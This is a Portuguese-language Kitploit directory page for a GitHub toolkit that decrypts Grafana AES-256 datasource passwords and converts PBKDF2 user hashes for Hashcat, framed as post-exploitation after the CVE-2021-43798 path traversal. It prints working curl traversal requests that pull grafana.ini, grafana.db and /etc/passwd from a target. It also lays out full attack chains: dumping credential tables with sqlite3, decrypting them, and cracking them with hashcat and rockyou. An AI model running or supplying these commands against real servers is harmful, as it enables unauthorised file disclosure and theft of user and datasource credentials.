Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Grafana-Password-Decryptor — Kit de ferramentas em Python para descriptografar AES-256 e quebrar senhas PBKDF2 de bancos de dados Grafana, geralmente usado em conjunto com (CVE-2021-43798) | Kitploit
Ferramentas/GitHubGitHub/strikoder-premium/grafana-password-decryptor
Quebra de SenhasFerramentas de Criptografia/DescriptografiaAnálise de VulnerabilidadesExploraçãoPós-ExploraçãoCriptografia
GitHubstrikoder-premium/grafana-password-decryptor

Grafana-Password-Decryptor

Kit de ferramentas em Python para descriptografar AES-256 e quebrar senhas PBKDF2 de bancos de dados Grafana, geralmente usado em conjunto com (CVE-2021-43798)

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
1há 8 mesesAinda não revisado

Descriptografador de Senhas do Grafana

Kit de ferramentas Python para descriptografar e quebrar senhas do Grafana a partir de vários formatos.

Codificado por: strikoder

O Que Esta Ferramenta Faz?

Lida com dois tipos de armazenamento de senhas do Grafana:

  • 🔐 AES-256 Base64 (tabela data_source) → Descriptografe diretamente com AESDecrypt.py
  • 🔨 PBKDF2_HMAC_SHA256 (tabela user) → Converta para o Hashcat com grafana2hashcat.py

Perfeito para pós-exploração após o path traversal CVE-2021-43798.

O que é CVE-2021-43798?

Uma vulnerabilidade de path traversal nas versões 8.0.0-beta1 a 8.3.0 do Grafana que permite que atacantes não autenticados leiam arquivos arbitrários do servidor, incluindo:

  • Arquivos de configuração (/etc/grafana/grafana.ini)
  • Arquivos de banco de dados (/var/lib/grafana/grafana.db)
  • Arquivos de sistema (/etc/passwd)

Exemplo de exploit:

root@kitploit:~
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is --output grafana.db

Este kit de ferramentas completa a cadeia de ataque ao descriptografar/quebrar as senhas que você extrai do banco de dados.

Ferramentas Incluídas

1. AESDecrypt.py

Descriptografa senhas criptografadas com AES-256 da tabela data_source.

Baseado em: jas502n/Grafana-CVE-2021-43798 com melhorias importantes:

  • ✅ Chave Secreta Flexível: Extraia a chave manualmente (sem caminhos fixos no código)
  • ✅ Processamento em Lote: Descriptografe vários hashes a partir de um arquivo
  • ✅ Totalmente Configurável: Todos os parâmetros via flags de CLI

2. grafana2hashcat.py

Converte hashes PBKDF2_HMAC_SHA256 do Grafana da tabela user para o formato compatível com Hashcat para quebra de senhas.

Crédito: iamaldi/grafana2hashcat

Instalação

root@kitploit:~
git clone https://github.com/strikoder/Grafana-Password-Decryptor.git
cd Grafana-Password-Decryptor
pip install cryptography #for Decyrption
chmod +x AESDecrypt.py grafana2hashcat.py

Uso

Ferramenta 1: AESDecrypt.py (para senhas AES-256 Base64)

Descriptografar Hash Único

root@kitploit:~
python3 AESDecrypt.py -hash R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==

Descriptografar Vários Hashes

root@kitploit:~
python3 AESDecrypt.py -f hashes.txt

Usando Chave Secreta Personalizada

Extraia a chave secreta da configuração do Grafana:

root@kitploit:~
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../etc/grafana/grafana.ini' --path-as-is | grep secret_key

python3 AESDecrypt.py -hash [HASH] -k YOUR_SECRET_KEY

Ferramenta 2: grafana2hashcat.py (para hashes PBKDF2)

Converter Arquivo de Hash Único

root@kitploit:~
python3 grafana2hashcat.py grafana_hashes.txt

Formato de entrada (grafana_hashes.txt):

root@kitploit:~
hash1,salt1
hash2,salt2
hash3,salt3

Saída (pronta para o Hashcat):

root@kitploit:~
sha256:10000:base64_salt:base64_hash

Salvar em Arquivo

root@kitploit:~
python3 grafana2hashcat.py grafana_hashes.txt -o hashcat_hashes.txt

Quebrar com Hashcat

root@kitploit:~
hashcat -m 10900 hashcat_hashes.txt wordlist.txt

Exemplo Completo de Exploração

Cenário 1: Senhas Criptografadas com AES (tabela data_source)

root@kitploit:~
# 1. Extract secret key from grafana.ini (might be empty in some cases, use default key in python program in that case)
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../etc/grafana/grafana.ini' \
  --path-as-is | grep secret_key

# 2. Download the database
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is -o grafana.db

# 3. Extract AES-encrypted passwords from data_source table
sqlite3 grafana.db "SELECT name, password FROM data_source;"

# 4. Save passwords to file (one per line)
# Example: R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==

# 5. Decrypt with extracted secret key
python3 AESDecrypt.py -f passwords.txt -k [SECRET_KEY]

Cenário 2: Hashes PBKDF2 (tabela user)

root@kitploit:~
# 0. Download the database
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is -o grafana.db

# 1. Extract PBKDF2 password hashes from user table
sqlite3 grafana.db "SELECT login, password, salt FROM user;"

# 2. Format hashes for grafana2hashcat (hash,salt format)
# Example format in grafana_hashes.txt:
# 3ad31dc57a7452c442f259cfff7aa61f2a6cea88ee634724ae146e221ae4e01c56c8bcbb3552310acd2fd746a396d2f99bf8,pepper

# 3. Convert to Hashcat format
python3 grafana2hashcat.py grafana_hashes.txt -o hashcat_hashes.txt

# 4. Crack with Hashcat (mode 10900 = PBKDF2-HMAC-SHA256)
hashcat -m 10900 hashcat_hashes.txt rockyou.txt

Referência Rápida: Qual Ferramenta Usar?

Créditos

  • AESDecrypt.py: Codificado por strikoder, baseado na implementação em Go de jas502n
  • grafana2hashcat.py: Criado por iamaldi

⭐ Achou útil? Dê uma estrela!

Codificado por strikoder

Baixar ferramenta
Tipo de SenhaTabela do BancoFormatoFerramentaModo Hashcat
Criptografada com AES-256data_sourceString Base64AESDecrypt.pyN/A (descriptografia direta)
PBKDF2_HMAC_SHA256userHash hexadecimal + saltgrafana2hashcat.py-m 10900